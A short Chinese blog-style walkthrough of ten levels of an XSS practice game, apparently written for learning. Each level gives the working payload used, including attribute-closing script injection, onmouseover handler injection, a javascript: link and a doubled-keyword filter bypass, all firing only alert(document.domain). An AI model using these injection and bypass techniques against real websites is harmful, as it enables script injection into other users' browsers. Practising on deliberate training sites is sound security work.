今天周末,找了个XSS游戏,直接开始,打开地址:https://xss-quiz.int21h.jp/
第一关:
有搜索框,直接输入代码试试:11"/><script>alert(document.domain);</script>alert(document.domain);
第二关:
进入第二关,同样直接输入代码:11"/><script>alert(document.domain);</script>
果然不行,再看源代码:
有标签,直接闭合标签:1111"/><script>alert(document.domain)</script><
第三关:
进入第三关,直接输入任意内容搜索看结果:
有两个参数,抓包,在第二个标签输入代码(果然没过滤):<script>alert(document.domain)</script>
第四关:
第四关又多了一个参数,抓包在新参数插入代码:
没弹框?,看源码:
有闭合,闭合尖括号:”/><script>alert(document.domain)</script><”
第五关:
第五关新参数又没了:
看源代码没什么特别,就是闭合标签,还做了输入限制:
直接修改限制,输入代码()和上关一样:”/><script>alert(document.domain)</script><”
还是不行,果然忽略了闭合,直接在input标签执行”onmouseover=”alert(document.domain)
当然直接抓包进行不会有限制字数。
第六关:
进入关发现和上一关差不多,应该又是做了其他限制:
上代码:”onmouseover=”alert(document.domain)
第七关:
这一关和上两关页面一样:
同样上代码:"onmouseover="alert(document.domain)
双引号被编码了,那就用空格:onmouseover= alert(document.domain)
第八关:
这关是在搜索框输入内容,点击内容转换成链接,再点链接转到链接地址:
看源码,链接再a标签里:
A标签用javascript执行:javascript:alert(document.domain)
第九关:
这关是UTF-7编码:
编码以后也不行,上网查了下,果然是需要ie环境的,这个没有,直接过吧,毕竟有firebug:
第十关:
看源代码直接执行代码:”onmouseover=”alert(document.domain),结果,domain被过滤:
直接双写进行绕过:" onmouseover="alert(document.ddomainomain)
今天就到这了·。
